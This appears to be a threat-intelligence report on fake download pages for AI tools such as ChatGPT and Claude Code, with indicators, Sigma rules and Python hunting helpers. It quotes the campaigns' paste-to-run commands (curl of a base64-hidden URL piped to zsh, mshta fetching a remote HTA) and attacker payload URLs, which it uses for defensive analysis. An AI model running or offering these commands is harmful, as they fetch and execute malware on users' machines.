Detection Chokepoints
Software Impersonation Infrastructure

Hunt data: de-intel-pipeline  ·  Pipeline records: 1569  ·  5 validated hunts  ·  2026-02-15 to 2026-05-17  ·  Aggregate updated: 2026-03-22

Data: Validated de-intel-pipeline hunts (URLScan/sandbox-cited) + aggregate IOC pipeline (MalwareBazaar, ThreatFox, URLScan), payload-hash confirmed.
5 validated hunts · 5 brands targeted · 2 confirmed delivery · 1569 pipeline records · 6 payload families · 0 pipeline campaigns

Detection Chokepoint Framework

Every masquerading delivery campaign follows the same chain. The brand changes. The lure page changes. The payload host rotates. But the prerequisites don't: the adversary must register infrastructure, build a convincing lure, stage a payload, and get the victim to execute something. Perfect visual impersonation neutralizes user-facing trust signals - your detection budget belongs at execution and infrastructure layers.

1. Brand recon - favicon hash, title pivot (T1595 RECON)
2. Domain registration - squat, typosquat, co.com TLD (T1583.001 DOMAINS)
3. Lure page build - clone + stolen favicon/logo (T1036.005 MASQ)
4. Payload staging - CDN, BunnyCDN, HTA host (T1608.001 STAGE)
5. Delivery gate - JS click, UA filter, modal (T1566.002 PHISH)
6. User execution - EXE, mshta, curl|zsh (T1204.002 EXEC)

Stages 1–3 are largely blind to endpoint detection. Favicon pivots and domain registration happen off-network. The lure page looks identical to the real product. Detection compounds at payload staging (network/DNS), delivery gate (proxy/IOK), and user execution (EDR/Sigma). A detection that fires only on the domain name breaks when the operator rotates hosting; one that fires on signed-binary-from-Downloads survives the rotation.

Infrastructure Patterns Across Hunts

Favicon hash pivot discovery: 3/5
Cloudflare-fronted infrastructure: 2/5
Post-launch domain squatting: 2/5
BunnyCDN payload staging: 1/5
Oracle Cloud hosting: 1/5
Shell-company Authenticode signing: 1/5
Affiliate / UTM tracking backend: 1/5
Base64 URL obfuscation in page JS: 1/5
mshta HTA delivery path: 1/5
Developer API endpoint impersonation: 1/5

Active Campaigns (Hunt Intelligence)

Validated hunts from the de-intel-pipeline. Each object passed schema, citation, and source-diversity validation before promotion to hunts/.

ChatGPT / OpenAI · 2026-05-13 → 2026-05-16 · 5 IOCs · 4 TTPs · CONFIRMED DELIVERY
ChatGPT-Impersonation-MROScanner-Installer - Phishing / lure page, EXE download, CDN staging, Code signing abuse, Favicon pivot
Domains: chatgpt-windows.com · app-update-chatgpt.com

Claude / Anthropic · 2026-04-17 → 2026-05-17 · 8 IOCs · 4 TTPs · CONFIRMED DELIVERY
Claude-Code-Impersonation-ClickFix-Install-Modal - Phishing / lure page, mshta HTA, curl | shell, Obfuscation, Favicon pivot
Domains: uneifoifow-3ndfskq.pages.dev · too.clawddddd.com · fine-byte2.com · download.version-516.com

LM Studio · 2026-04-30 → 2026-05-17 · 2 IOCs · 2 TTPs · SURVEY / SQUAT
LM-Studio-Domain-Squatting-API-Endpoint-Impersonation - Brand masquerade, Phishing / lure page
Domains: lmstudio.co.com · www.api.lmstudio.co.com

Notion · 2026-02-15 → 2026-05-17 · 1 IOC · 0 TTPs · SURVEY / SQUAT
Notion-Masquerade-Delivery-Survey - Survey / squat only
Domains: notiondownload.com

OpenAI Codex CLI · 2026-04-12 → 2026-05-17 · 4 IOCs · 2 TTPs · SURVEY / SQUAT
OpenAI-Codex-CLI-Domain-Squatting-Credential-Harvest - Brand masquerade, Phishing / lure page
Domains: codex-cli.org · codexhub.click · codexcli.homes · codexcli.gr.com

Brand Impersonation Matrix

| Brand | Campaigns | Delivery methods | Confirmed delivery |
|---|---|---|---|
| ChatGPT / OpenAI | 1 | CDN staging; Code signing abuse; EXE download; Favicon pivot; Phishing / lure page | Yes |
| Claude / Anthropic | 1 | Favicon pivot; Obfuscation; Phishing / lure page; curl \| shell; mshta HTA | Yes |
| LM Studio | 1 | Brand masquerade; Phishing / lure page | No |
| Notion | 1 | Survey / squat only | No |
| OpenAI Codex CLI | 1 | Brand masquerade; Phishing / lure page | No |

ChatGPT Impersonation - MROScanner OU Installer

A fake "ChatGPT for Windows" download page (chatgpt-windows.com) on Oracle Cloud serves a 2.3 MB Inno Setup installer signed by Estonian shell company MROScanner OU. Download is JS-gated - no static link in HTML - with Windows-only UA fingerprinting and per-visitor affiliate tracking via a PHP backend. Payload staged on BunnyCDN.

POST /init/tracking.php
→ returns per-visitor URL: https://app-cg.b-cdn.net/ChatGPT_Installer.exe?hash=<token>

ChatGPT_Installer.exe
SHA-256: 17dc646d645252196a19e87752fa21dbe7b626cd71a9dacddebd9a2ed8f1e16e
Signer: MROScanner OU (SSL.com, thumbprint E3B6CF11...)

The cert is the stickiest signal. MROScanner OU + thumbprint E3B6CF11... appears on every binary this operator signs until revocation (valid until April 2027). The domain rotates. The CDN bucket name rotates. The cert thumbprint does not. Monitor VT/Hunt.io for new hits on this signer.

JS-only download gate defeats static scanners. URLScan sees a blank download page. The payload URL surfaces only after JavaScript executes a POST to /init/tracking.php. Non-Windows user-agents get "Unsupported System" - further reducing scanner noise and narrowing the victim pool to paid malvertising traffic (UTM params: fbclid, bid, tid).

| Signal | Durability | Notes |
|---|---|---|
| chatgpt-windows.com | Medium | 3-year squatter history; repurposed May 2026 |
| app-cg.b-cdn.net | Low | CDN bucket - hash the binary when sandbox completes |
| MROScanner OU cert | High | Pivot on thumbprint across VT/Hunt.io |
| /init/tracking.php | Medium | Same PHP structure links sibling campaigns |

Claude Code - ClickFix Install Modal

Three fake "Download Claude" pages clone claude.com and present a fake install modal. Mac victims run a base64-concealed curl | zsh command; Windows victims run mshta https://download.version-516.com/claude. The kit predates Claude targeting - /other path was active 12 days before /claude.

# Mac - social cover echo, then malicious curl
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh

# Windows - HTA via signed LOLBin
mshta https://download.version-516.com/claude

Different delivery model - no file on disk for the primary vector. Paste-to-run bypasses SmartScreen entirely. The victim opens a terminal, reads a command that looks like official Anthropic install docs, and executes it. Cross-platform delivery (Mac + Windows) from the same kit with per-site payload domain rotation (xprssit.com vs ewabeniak.com).

Real Anthropic analytics loaded on every visit. Clone pages load Segment, Amplitude, and claude-custom-tracking.js from www.anthropic.com. Victim traffic blends into legitimate claude.com analytics noise - a subtle signal worth monitoring if you correlate page views with actual installs.

| Domain | Role |
|---|---|
| uneifoifow-3ndfskq.pages.dev | Cloudflare Pages lure; Mac payload via xprssit.com |
| too.clawddddd.com | Typosquat lure; Mac payload via ewabeniak.com |
| download.version-516.com | Shared Windows HTA host (/claude, /other) |
| xprssit.com / ewabeniak.com | Per-site Mac shell script delivery (/curl/<hash>) |

OpenAI Codex CLI - Domain Squatting

Multiple domains registered within weeks of the Codex CLI public launch (April 2026) squat the exact product name. No confirmed binary delivery - credential harvest and SEO poisoning targeting developers who search for install instructions instead of using npm install -g @openai/codex.

Developer tool distribution shifts the attack surface. CLI tools distributed via npm/GitHub have no downloadable installer page - favicon hash pivots don't apply when Cloudflare bot-protects openai.com. Adversaries pivot to title-based and domain-pattern queries. Watch for ClickFix paste-to-run pages appearing on these domains - the Claude Code hunt found the same pattern on Cloudflare Pages sites with similar domain age profiles.

| Domain | Status | Pattern |
|---|---|---|
| codex-cli.org | Phishing-tagged; dormant empty HTML | Squats npm package name |
| codexhub.click | Vietnamese Codex CLI page + /login | Credential harvest suspected |
| codexcli.homes | SSL cipher mismatch - conditional serving | Geo/IP gated content |
| codexcli.gr.com | 404 at scan time | Dormant squat infrastructure |

LM Studio - API Endpoint Impersonation

lmstudio.co.com redirects to www.api.lmstudio.co.com, impersonating the LM Studio local API server (normally localhost:1234). No installer delivery - threat is prompt exfiltration or API key theft via a misconfigured client endpoint string.

The exposure is the supply chain of developer tooling config: a domain at api.lmstudio.co.com is indistinguishable from a legitimate remote LM Studio endpoint in a config string. Watch for this pattern on Ollama (localhost:11434), Jan.ai, AnythingLLM. DNS was pulled by May 11, 2026 after community phishing reports.

Notion Coverage Survey

Favicon pivot for Notion returned 5,692 non-Notion hits - structurally too noisy because Notion is used as a CMS backend by thousands of legitimate sites. No active Windows/Mac delivery campaign detected in the last 90 days. Only finding: notiondownload.com (Android APK squatter, Hostinger).

Not every brand is pivot-able. Heavily embedded brands (Notion, Google Docs) copy favicons verbatim across legitimate third-party sites. File-type narrowing (filename:*.exe) requires a URLScan API key. Title pivots and domain-pattern queries are the fallback when favicon hash pivots produce unusable noise.

Cross-Campaign Operator Comparison

Two distinct delivery philosophies emerged from the May 2026 hunt window - traditional EXE distribution vs. paste-to-run developer targeting.

| | MROScanner OU (ChatGPT) | ClickFix Install Modal (Claude) |
|---|---|---|
| Delivery | EXE download (JS-gated) | Paste-to-run command |
| File on disk | Yes - Inno Setup installer | No file for primary vector |
| Code signing | Shell-company Authenticode | Not applicable |
| OS targeting | Windows only (UA filter) | Mac + Windows (separate commands) |
| Obfuscation | BunnyCDN + per-visitor hash | Base64 URL in JS + domain rotation |
| Infrastructure | Oracle Cloud dedicated VM | Cloudflare Pages (ephemeral) |
| Traffic model | Paid malvertising (UTM tracking) | Real brand analytics loaded |
| Kit reuse | Unknown | Confirmed multi-brand (/other path) |
| Sophistication | Medium | Medium-high |

Two operators, same target demographic. Both campaigns impersonate AI developer tools released in 2025–2026. The EXE operator buys code signing certs and runs paid traffic. The ClickFix operator skips file download entirely and targets terminal-comfortable users. Your detection stack needs both paths: signed-binary-from-Downloads and unusual-parent → mshta/curl-from-terminal.

MITRE Technique Frequency (Hunts)

| Technique | Label | Hunts |
|---|---|---|
| T1566.002 | Phishing / lure page | 4 |
| T1036.005 | Brand masquerade | 2 |
| T1204.002 | EXE download | 1 |
| T1102 | CDN staging | 1 |
| T1553.002 | Code signing abuse | 1 |
| T1218.005 | mshta HTA | 1 |
| T1059.004 | curl \| shell | 1 |
| T1027 | Obfuscation | 1 |

Aggregate Pipeline Data

IOC-first pipeline records from confirmed payload reports and infrastructure hunts. Delivery chains shown only when URLScan captured the redirect sequence.

Payload Class Breakdown

stealer: 0 · c2: 0 · rmm: 0 · loader: 0 · unknown: 20

Confirmed Delivery Domains (sample)


Favicon Clusters

(Favicon cluster table - columns Hash, Domains, Sample - not captured in this extract.)

Weekly Volume

(Weekly volume chart - not captured in this extract.)

Detection Recommendations

Each recommendation maps to the ATT&CK technique it detects. Execution-layer rules survive brand rotation; domain blocklists do not.

T1036.005 - PE OriginalFilename mismatch
Alert when a process's OriginalFilename (from the PE version resource) does not match the filename it runs under. Adversaries rename malicious binaries - they rarely recompile with matching resources.
Example detection logic
title: Masqueraded Installer OriginalFilename Mismatch
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith:
      - '\ChatGPT_Installer.exe'
      - '\ZoomInstaller.exe'
      - '\DiscordSetup.exe'
    CurrentDirectory|contains:
      - '\Downloads\'
      - '\AppData\Local\Temp\'
  filter_legit:
    OriginalFileName|contains:
      - 'ChatGPT'
      - 'Zoom'
      - 'Discord'
  condition: selection and not filter_legit
level: high

T1553.002 - Shell-company signed binary from user download path
A signed binary executing from Downloads after a browser spawn is more anomalous than unsigned execution in managed environments. Legitimate signed software deploys via IT tooling, not user download directories. MROScanner OU is a known shell-company signer pattern.
Observed signers (1)
ChatGPT_Installer.exe
Signer: MROScanner OU (Tallinn, EE)
CA: SSL.com Code Signing Intermediate CA RSA R1
Thumbprint: E3B6CF111525417CE68C1CBE99E257DBAC54D071
Valid: 2026-04-22 to 2027-04-21
Example detection logic
title: Signed Installer Executed From Downloads After Browser Spawn
logsource:
  category: process_creation
  product: windows
detection:
  selection_parent:
    ParentImage|endswith:
      - '\chrome.exe'
      - '\msedge.exe'
      - '\firefox.exe'
  selection_installer:
    Image|endswith:
      - '\setup.exe'
      - '\installer.exe'
      - '\install.exe'
    CurrentDirectory|contains: '\Downloads\'
    Signed: 'true'
  filter_known_vendors:
    SignatureStatus: 'Valid'
    Signature|contains:
      - 'Microsoft'
      - 'Google'
      - 'Zoom'
  condition: selection_parent and selection_installer and not filter_known_vendors
level: high

T1218.005 - mshta fetching HTA from non-enterprise URL
mshta.exe spawned from cmd.exe, Run dialog, or terminal context fetching an HTA from an external domain. Covers Claude Code ClickFix Windows delivery via download.version-516.com/claude.
Observed payloads (1)
mshta https://download.version-516.com/claude
Example detection logic
title: Mshta Executing Remote HTA From Unusual Parent
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\mshta.exe'
    CommandLine|contains:
      - 'http://'
      - 'https://'
  selection_parent:
    ParentImage|endswith:
      - '\cmd.exe'
      - '\explorer.exe'
      - '\WindowsTerminal.exe'
  filter_enterprise:
    CommandLine|contains:
      - '.microsoft.com'
      - '.windows.com'
  condition: selection and selection_parent and not filter_enterprise
level: high

T1059.004 - curl piped to shell from terminal (Mac developer targeting)
Detect curl -s ... | zsh or curl ... | bash where the URL domain is not a known package manager or vendor CDN. Claude Code install modal uses base64-concealed curl URLs on attacker-controlled domains.
Observed payloads (2)
# Social cover echo + malicious curl (Mac)
echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '<base64>' | openssl base64 -d -A) | zsh

# Decoded payload URL (uneifoifow variant)
https://xprssit.com/curl/6df71b43667a2d1d9de3e88cba7e16fb11b4ddf67af64b853b903b3fa8ead500
Example detection logic
title: Curl Piped to Shell From Non-Vendor Domain
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    Image|endswith:
      - '/curl'
      - '/zsh'
      - '/bash'
    CommandLine|contains|all:
      - 'curl'
      - '|'
  filter_vendors:
    CommandLine|contains:
      - 'anthropic.com'
      - 'homebrew.sh'
      - 'github.com'
  condition: selection and not filter_vendors
level: high
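As an added Python example (not code from this page or the hunt pipeline), the curl-to-shell check above applied to a captured command line: it expands the `$(echo '<base64>' | openssl base64 -d)` substitution the Mac lure uses, pulls the URL out of the curl stage, and applies the vendor allowlist to that URL's host rather than to the whole command line, because the lure's decoy echo already carries a vendor install URL that a CommandLine-wide contains filter would accept. The allowlist contents and the payload domain payload.example.invalid are constructed assumptions.

```python
import base64
import re
from urllib.parse import urlparse

# Hypothetical vendor allowlist: the page's filter_vendors list plus claude.ai (the real installer host).
VENDOR_ALLOWLIST = {"anthropic.com", "claude.ai", "homebrew.sh", "github.com"}

# $(echo '<b64>' | openssl base64 -d [-A])  or  $(echo '<b64>' | base64 -d|-D|--decode)
B64_SUBST = re.compile(
    r"\$\(\s*echo\s+['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\|\s*"
    r"(?:openssl\s+base64\s+-d(?:\s+-A)?|base64\s+(?:-d|-D|--decode))\s*\)"
)
# A curl stage whose stdout is piped straight into a shell interpreter.
CURL_TO_SHELL = re.compile(r"\bcurl\b([^|;&]*)\|\s*(?:sudo\s+)?(?:zsh|bash|sh|dash)\b")
URL_RE = re.compile(r"https?://[^\s'\"|)]+")

def expand_base64_substitutions(cmdline: str) -> str:
    """Replace base64-decoding command substitutions with the text they would produce."""
    def _decode(m):
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
        except ValueError:
            return m.group(0)  # not valid base64: leave the substitution untouched
    return B64_SUBST.sub(_decode, cmdline)

def host_allowlisted(host: str) -> bool:
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in VENDOR_ALLOWLIST)

def naive_commandline_filter(cmdline: str) -> bool:
    """CommandLine|contains-style filter: suppressed by any vendor string anywhere on the line."""
    return any(d in cmdline for d in VENDOR_ALLOWLIST)

def analyse(cmdline: str) -> dict:
    """Find curl-to-shell stages and judge each by the host that is actually fetched."""
    expanded = expand_base64_substitutions(cmdline)
    findings = []
    for stage in CURL_TO_SHELL.finditer(expanded):
        for url in URL_RE.findall(stage.group(1)):
            host = urlparse(url).hostname or ""
            findings.append({"url": url, "host": host, "suspicious": not host_allowlisted(host)})
    return {"expanded": expanded, "findings": findings,
            "alert": any(f["suspicious"] for f in findings)}

# Constructed samples: same shape as the page's Mac lure, with a placeholder payload domain.
PAYLOAD_URL = "https://payload.example.invalid/curl/abc123"
LURE_CMD = ('echo "Downloading Claude: https://claude.ai/install.sh" && curl -s $(echo '
            f"'{base64.b64encode(PAYLOAD_URL.encode()).decode()}' | openssl base64 -d -A) | zsh")
BENIGN_CMD = "curl -fsSL https://claude.ai/install.sh | bash"
```

Running `analyse(LURE_CMD)` raises the alert on payload.example.invalid while `naive_commandline_filter(LURE_CMD)` is satisfied by the decoy claude.ai string; the benign installer line produces no alert.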

INFRA - Favicon hash pivoting for infrastructure clustering
From one confirmed fake domain: fetch favicon, compute Murmur3 hash, query Shodan/URLScan. Campaigns reusing stolen favicons across dozens of domains surface immediately. ChatGPT hunt: 158 hits on OpenAI favicon pivot; Claude: 1,003 hits.
Example hunt queries
# URLScan favicon pivot (ChatGPT)
hash:9747c13cd87b36ebf2ab567b9d0bc2ff49b5a4f46f4f51e4d053024f579fb9a0 AND NOT page.domain:openai.com

# URLScan favicon pivot (Claude)
hash:816a55828befeb50fe8a9556cb92d80194efefbd3f4e04ccf694992dd8e085e3 AND NOT page.domain:claude.ai

# Shodan
http.favicon.hash:<mmh3_int>
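To make the pivot reproducible without a third-party hashing library, here is an added Python example (not part of the page or the hunt pipeline) that derives both query forms from favicon bytes you fetched yourself: the URLScan hash: value is the SHA-256 of the file, while Shodan's http.favicon.hash is MurmurHash3 (x86_32, signed) over the base64 text of the file, line breaks included. murmur3_32 is a pure-Python port standing in for the mmh3 package, and SAMPLE_FAVICON is constructed stand-in data.

```python
import base64
import hashlib

MASK = 0xFFFFFFFF

def _mix_k1(k1: int) -> int:
    k1 = (k1 * 0xCC9E2D51) & MASK
    k1 = ((k1 << 15) | (k1 >> 17)) & MASK
    return (k1 * 0x1B873593) & MASK

def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 x86_32 with a signed result, i.e. what mmh3.hash() returns (pure Python)."""
    h1 = seed & MASK
    nblocks = len(data) // 4
    for i in range(0, nblocks * 4, 4):
        h1 ^= _mix_k1(int.from_bytes(data[i:i + 4], "little"))
        h1 = ((h1 << 13) | (h1 >> 19)) & MASK
        h1 = (h1 * 5 + 0xE6546B64) & MASK
    tail = data[nblocks * 4:]
    if tail:  # 1-3 trailing bytes, zero-extended; no extra h1 rotation for the tail
        h1 ^= _mix_k1(int.from_bytes(tail, "little"))
    h1 ^= len(data)
    h1 ^= h1 >> 16  # fmix32 finaliser
    h1 = (h1 * 0x85EBCA6B) & MASK
    h1 ^= h1 >> 13
    h1 = (h1 * 0xC2B2AE35) & MASK
    h1 ^= h1 >> 16
    return h1 - 0x100000000 if h1 & 0x80000000 else h1

def shodan_favicon_hash(favicon: bytes) -> int:
    """http.favicon.hash as Shodan computes it: mmh3 over the base64 *text* of the file,
    including the 76-column line breaks and trailing newline that codecs/encodebytes emit."""
    return murmur3_32(base64.encodebytes(favicon))

def urlscan_favicon_hash(favicon: bytes) -> str:
    """URLScan's hash: field matches the SHA-256 of the fetched resource body."""
    return hashlib.sha256(favicon).hexdigest()

def pivot_queries(favicon: bytes, legit_domain: str) -> dict:
    """Build the two pivot queries shown above from a favicon you fetched yourself."""
    return {
        "urlscan": f"hash:{urlscan_favicon_hash(favicon)} AND NOT page.domain:{legit_domain}",
        "shodan": f"http.favicon.hash:{shodan_favicon_hash(favicon)}",
    }

# Constructed stand-in for favicon bytes fetched from the legitimate brand site.
SAMPLE_FAVICON = b"\x00\x00\x01\x00" + bytes(range(256)) * 3
```

`pivot_queries(SAMPLE_FAVICON, "openai.com")` returns the URLScan and Shodan query strings; feed it the real favicon bytes and the brand's legitimate domain to reproduce the pivots above.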

INFRA - Affiliate tracking backend fingerprint
The /init/tracking.php + /init/pixel.php endpoint pattern with UTM parameters (fbclid, bid, tid) indicates a paid traffic malvertising campaign. If this PHP structure reappears on another fake download page, it connects campaigns to the same kit or operator.
Example detection logic
# Proxy / DNS - hunt for sibling sites
cs-uri-stem: '/init/tracking.php'
cs-method: 'POST'
cs-uri-query|contains:
  - 'utm_source='
  - 'fbclid='

# URLScan pivot
page.url:"/init/tracking.php" AND filename:*.exe
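As an added example (not from the page), the proxy-log side of this hunt as a small Python routine over constructed W3C extended log lines: it keeps only hits on the /init/ endpoints that are POSTs or carry the affiliate parameters named above, then lists the distinct lure hosts sharing the backend. Field names follow the W3C extended log format the cs-* fields above come from; chatgpt-windows.com is the lure named on the page, every other hostname in the sample is a placeholder.

```python
from urllib.parse import parse_qs

# Endpoint paths and affiliate parameters of the tracking backend described above.
TRACKING_PATHS = {"/init/tracking.php", "/init/pixel.php"}
AFFILIATE_PARAMS = {"utm_source", "fbclid", "bid", "tid"}

def parse_w3c_log(text: str) -> list:
    """Parse W3C extended log text (the format most proxies export) into dicts keyed by #Fields names."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

def flag_tracking_backend(rows: list) -> list:
    """Return requests that fit the kit's backend: a tracking-path hit that is a POST
    or that carries affiliate/UTM parameters. A bare GET with no params is left alone
    (an unrelated site can host a file of the same name)."""
    hits = []
    for r in rows:
        if r.get("cs-uri-stem") not in TRACKING_PATHS:
            continue
        query = r.get("cs-uri-query", "-")
        params = set(parse_qs("" if query == "-" else query)) & AFFILIATE_PARAMS
        if r.get("cs-method") == "POST" or params:
            hits.append({"host": r.get("cs-host"), "client": r.get("c-ip"),
                         "method": r.get("cs-method"), "path": r["cs-uri-stem"],
                         "affiliate_params": sorted(params)})
    return hits

def sibling_hosts(hits: list) -> list:
    """Distinct lure hosts sharing the backend: candidates for the same kit or operator."""
    return sorted({h["host"] for h in hits if h["host"]})

# Constructed sample log (not real proxy output). chatgpt-windows.com is the lure named on
# the page; lure-sibling.example stands in for a second site sharing the same PHP backend.
SAMPLE_LOG = """#Software: constructed sample
#Fields: date time c-ip cs-method cs-host cs-uri-stem cs-uri-query sc-status
2026-05-14 10:02:11 10.0.0.21 GET chatgpt-windows.com /download/ utm_source=fb&fbclid=AbC123 200
2026-05-14 10:02:12 10.0.0.21 POST chatgpt-windows.com /init/tracking.php utm_source=fb&fbclid=AbC123&bid=77 200
2026-05-14 10:02:13 10.0.0.21 GET chatgpt-windows.com /init/pixel.php tid=9981 200
2026-05-14 11:45:02 10.0.0.40 POST lure-sibling.example /init/tracking.php utm_source=bing&bid=12 200
2026-05-14 12:00:00 10.0.0.55 GET intranet.example /init/tracking.php - 404
"""
```

`sibling_hosts(flag_tracking_backend(parse_w3c_log(SAMPLE_LOG)))` yields the two lure hosts; the intranet GET with no parameters is not reported.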